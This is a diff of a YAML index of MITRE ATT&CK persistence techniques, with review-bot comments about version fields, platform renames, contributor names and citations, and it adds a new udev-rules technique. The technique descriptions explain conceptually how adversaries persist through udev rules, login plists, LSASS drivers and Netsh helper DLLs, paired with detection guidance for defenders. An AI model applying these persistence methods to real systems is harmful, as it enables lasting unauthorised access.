- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor property changes in Group Policy: Computer
Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
Policy\\Store passwords using reversible encryption
. By default, the
@@ -35167,23 +35530,50 @@ persistence:
Directory PowerShell modules, such as Set-ADUser
and Set-ADAccountControl
,
that change account configurations. \n\nMonitor Fine-Grained Password Policies
and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
- 'User Account: User Account Metadata'
- 'Script: Script Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+ created: '2022-01-13T20:02:28.349Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/005
+ external_id: T1556.005
+ - source_name: dump_pwd_dcsync
+ description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+ All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+ url: https://adsecurity.org/?p=2053
+ - source_name: store_pwd_rev_enc
+ description: Microsoft. (2021, October 28). Store passwords using reversible
+ encryption. Retrieved January 3, 2022.
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+ - source_name: how_pwd_rev_enc_1
+ description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+ encryption: how it works (part 1). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+ - source_name: how_pwd_rev_enc_2
+ description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+ encryption: how it works (part 2). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1546.016:
technique:
- modified: '2024-04-12T02:23:44.583Z'
+ modified: '2024-04-28T15:52:44.332Z'
name: Installer Packages
description: |-
Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
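Review bot: `x_mitre_permissions_required` (`- User`, `- Administrator`) is dropped from T1556.005 with no replacement while the rest of the entry is regenerated (`x_mitre_version: '1.0'` to `'1.1'`, `x_mitre_attack_spec_version: 2.1.0` to `3.2.0`, `spec_version: '2.1'` removed). If this reflects a newer upstream ATT&CK bundle that no longer emits the field, say so in the PR description; if it is a lossy re-export, anything that filters atomics by required permission level loses data. The same removal recurs for T1505.001 further down (`- Administrator`, `- SYSTEM`, `- root`), so one explanation covers both.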
@@ -35200,7 +35590,7 @@ persistence:
phase_name: persistence
x_mitre_contributors:
- Brandon Dalton @PartyD0lphin
- - Alexander Rodchenko
+ - Rodchenko Aleksandr
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
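Review bot: the contributor rename `- Alexander Rodchenko` to `- Rodchenko Aleksandr` puts the family name first, while the T1653 hunk later in this diff flips `- Goldstein Menachem` to `- Menachem Goldstein`, i.e. given name first. If both mirror the upstream ATT&CK records verbatim that is fine; if either is a local edit, settle on one ordering for the file.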
@@ -35259,7 +35649,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.004:
technique:
@@ -35341,7 +35730,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.004
atomic_tests: []
T1543.002:
@@ -35456,12 +35844,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.002
atomic_tests: []
T1136:
technique:
- modified: '2024-01-31T20:46:43.215Z'
+ modified: '2024-10-15T15:53:21.895Z'
name: Create Account
description: |-
Adversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020) With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
@@ -35484,16 +35871,15 @@ persistence:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- IaaS
- Linux
- macOS
- - Google Workspace
- Network
- Containers
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
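Review bot: any tooling that builds per-platform indexes or filters tests by platform string will silently drop T1136 once `- Azure AD`, `- Office 365` and `- Google Workspace` leave `x_mitre_platforms` in favour of `- Office Suite` and `- Identity Provider` (the same rename lands on T1098.002, T1137.002, T1078.004 and T1556 below). The platform-to-index mapping and any documentation listing supported platforms need the new names in the same change.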
@@ -35520,7 +35906,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.013:
technique:
@@ -35589,7 +35974,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.007:
technique:
@@ -35625,7 +36009,7 @@ persistence:
Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist
within the ~/Library/Preferences/ByHost
directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the com.apple.loginwindow.[UUID].plist
file to execute payloads when a user logs in.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T23:46:56.443Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: Re-opened Applications'
x_mitre_detection: Monitoring the specific plist files associated with reopening
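Review bot: `modified` moves backwards here, from `'2022-05-11T14:00:00.188Z'` to `'2022-04-19T23:46:56.443Z'`, and the same regression appears for T1574.002, T1037.001, T1547.008, T1546.007, T1556.004, T1574.004 and T1574.012 later in the diff. Most of the old values share the `14:00:00.188Z` suffix, which reads as a batch-assigned placeholder rather than a real STIX timestamp, so the new earlier-but-precise values are probably the upstream ones; confirm that, and check that nothing sorts or de-duplicates entries by `modified` on the assumption that it only ever increases.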
@@ -35644,12 +36028,11 @@ persistence:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.007
atomic_tests: []
T1574.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.241Z'
name: 'Hijack Execution Flow: DLL Side-Loading'
description: |-
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -35699,12 +36082,11 @@ persistence:
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.002
atomic_tests: []
T1098.002:
technique:
- modified: '2024-01-03T15:46:06.706Z'
+ modified: '2024-10-15T15:37:25.303Z'
name: 'Account Manipulation: Additional Email Delegate Permissions'
description: "Adversaries may grant additional permission levels to maintain
persistent access to an adversary-controlled email account. \n\nFor example,
@@ -35737,9 +36119,10 @@ persistence:
x_mitre_contributors:
- Microsoft Detection and Response Team (DART)
- Mike Burns, Mandiant
- - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
- Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
- Arad Inbar, Fidelis Security
+ - Nilesh Dherange (Gurucul)
+ - Naveen Vijayaraghavan
x_mitre_deprecated: false
x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
permissions changes that may indicate excessively broad permissions being
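Review bot: attribution changes when `- Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)` is split into `- Nilesh Dherange (Gurucul)` and `- Naveen Vijayaraghavan`: the original line reads as both contributors being at Gurucul, the new lines credit the affiliation to Dherange only. Confirm against the upstream T1098.002 record before merging; note also that the two names are appended after `- Arad Inbar, Fidelis Security` rather than kept in place, so contributor order changes as well.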
@@ -35756,9 +36139,8 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- - Google Workspace
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Group: Group Modification'
- 'Application Log: Application Log Content'
@@ -35804,12 +36186,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.002
atomic_tests: []
T1653:
technique:
- modified: '2023-09-30T21:28:45.038Z'
+ modified: '2024-10-16T20:11:40.334Z'
name: Power Settings
description: |-
Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.(Citation: Sleep, shut down, hibernate)
@@ -35823,7 +36204,7 @@ persistence:
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
- Juan Tapiador
x_mitre_deprecated: false
x_mitre_detection: "Command-line invocation of tools capable of modifying services
@@ -35882,7 +36263,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.001:
technique:
@@ -35908,7 +36288,7 @@ persistence:
url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
18. Retrieved November 15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:03.153Z'
name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
description: "Adversaries may use Windows logon scripts automatically executed
at logon initialization to establish persistence. Windows allows logon scripts
@@ -35934,13 +36314,11 @@ persistence:
- 'Command: Command Execution'
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1037.001
atomic_tests: []
T1137.002:
technique:
- modified: '2024-04-16T12:41:55.175Z'
+ modified: '2024-10-15T16:01:48.325Z'
name: 'Office Application Startup: Office Test'
description: |-
Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)
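Review bot: for T1037.001 this hunk removes both `- spec_version: '2.1'` and `- x_mitre_attack_spec_version: 2.1.0` without re-adding the spec version anywhere visible, unlike T1078.004 where `+ x_mitre_attack_spec_version: 3.2.0` is inserted earlier in the entry. T1556.004 (the `- spec_version` / `- x_mitre_attack_spec_version: 2.1.0` pair next to `x_mitre_permissions_required`) has the same shape. If those entries still carry the key outside the hunk context, fine; otherwise they become the only techniques in the index with no spec version, which is worth a quick grep before merge.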
@@ -35964,8 +36342,8 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'Command: Command Execution'
@@ -35995,7 +36373,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1137.002
atomic_tests: []
T1547.008:
@@ -36038,7 +36415,7 @@ persistence:
Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:34:43.405Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: LSASS Driver'
x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -36063,12 +36440,11 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.008
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -36108,8 +36484,10 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
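Review bot: key order is not stable across entries: for T1078.004 `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` are inserted near the top (after `phase_name: initial-access` and `x_mitre_is_subtechnique: true`) and the copies at the end are deleted in the following hunks, while neighbouring entries such as T1546.016 keep both keys at the end. That instability is most of what makes this diff large; emitting keys in a fixed order (sorted, or the upstream STIX order) would let future regenerations be reviewed as content changes only.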
@@ -36117,13 +36495,13 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -36154,9 +36532,6 @@ persistence:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests:
- name: Azure Persistence Automation Runbook Created or Modified
@@ -36240,10 +36615,10 @@ persistence:
terraform destroy -auto-approve
T1053.002:
technique:
- modified: '2023-11-15T14:38:10.876Z'
+ modified: '2024-10-12T15:53:12.333Z'
name: 'Scheduled Task/Job: At'
description: |-
- Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+ Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
@@ -36306,7 +36681,7 @@ persistence:
- Windows
- Linux
- macOS
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Scheduled Job: Scheduled Job Creation'
@@ -36340,8 +36715,8 @@ persistence:
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
@@ -36350,6 +36725,10 @@ persistence:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Malicious Life by Cybereason
+ description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+ the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+ url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
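Review bot: the new `Malicious Life by Cybereason` reference URL carries a `#blog-subscribe` fragment, which anchors to the subscription widget rather than the article; drop the fragment so the link opens on the cited content. The author field `Philip Tsukerman. (n.d.)` also departs from the `Surname, Initial.` form used by the surrounding entries (`Russinovich, M.`, `Loobeek, L.`), so `Tsukerman, P.` would match the file's citation style.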
@@ -36362,12 +36741,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.002
atomic_tests: []
T1556:
technique:
- modified: '2024-04-11T21:51:44.851Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Modify Authentication Process
description: |-
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -36380,6 +36758,7 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
@@ -36416,17 +36795,17 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network
- - Azure AD
- - Google Workspace
- IaaS
- - Office 365
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Process: Process Access'
@@ -36472,9 +36851,65 @@ persistence:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ atomic_tests: []
+ T1546.017:
+ technique:
+ modified: '2024-11-11T19:05:38.708Z'
+ name: Udev Rules
+ description: |-
+ Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+ Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Eduardo González Hernández (@codexlynx)
+ - Eder Pérez Ignacio, @ch4ik0
+ - Wirapong Petshagun
+ - "@grahamhelton3"
+ - Ruben Groenewoud, Elastic
+ x_mitre_deprecated: false
+ x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+ in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+ specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+ 2024) '
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'File: File Modification'
+ type: attack-pattern
+ id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+ created: '2024-09-26T17:02:09.888Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/017
+ external_id: T1546.017
+ - source_name: Ignacio Udev research 2024
+ description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+ persistence. Retrieved September 26, 2024.
+ url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+ - source_name: Elastic Linux Persistence 2024
+ description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+ - A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+ url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+ - source_name: Reichert aon sedexp 2024
+ description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+ Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+ url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.007:
technique:
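Review bot: the T1546.017 detection text names three rule directories (`/etc/udev/rules.d/`, `/lib/udev/rules.d/`, `/usr/lib/udev/rules.d/`) while the description lists five, leaving out `/run/udev/rules.d/` and `/usr/local/lib/udev/rules.d/`; anyone building file-modification monitoring from this index should watch all five, so if the detection text is a local paraphrase rather than verbatim upstream, add the missing two. Minor: the `x_mitre_detection` scalar has a trailing space before its closing quote (`2024) '`) and the third path lacks the backticks the other two have. Separately, the diff alignment makes it look as if T1556 loses `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref`; those keys were moved up in the T1556 hunks above and the context lines here now close the new T1546.017 entry, which is easiest to confirm by loading the YAML rather than reading the hunk.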
@@ -36511,7 +36946,7 @@ persistence:
Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh
.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:09:17.363Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Netsh Helper DLL'
x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -36535,51 +36970,11 @@ persistence:
- SYSTEM
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.007
atomic_tests: []
T1505.001:
technique:
- x_mitre_platforms:
- - Windows
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Carlos Borges, @huntingneo, CIP
- - Lucas da Silva Pereira, @vulcanunsec, CIP
- - Kaspersky
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
- type: attack-pattern
- created: '2019-12-12T14:59:58.168Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1505.001
- url: https://attack.mitre.org/techniques/T1505/001
- - source_name: NetSPI Startup Stored Procedures
- url: https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/
- description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
- SQL Server – Part 1: Startup Stored Procedures. Retrieved July 8, 2019.'
- - source_name: Kaspersky MSSQL Aug 2019
- url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
- description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
- attack on Microsoft SQL Server. Retrieved September 4, 2019.'
- - source_name: Microsoft xp_cmdshell 2017
- url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
- description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
- September 9, 2019.
- - source_name: Microsoft CLR Integration 2017
- url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
- description: Microsoft. (2017, June 19). Common Language Runtime Integration.
- Retrieved July 8, 2019.
- - source_name: NetSPI SQL Server CLR
- url: https://blog.netspi.com/attacking-sql-server-clr-assemblies/
- description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
- Retrieved July 8, 2019.
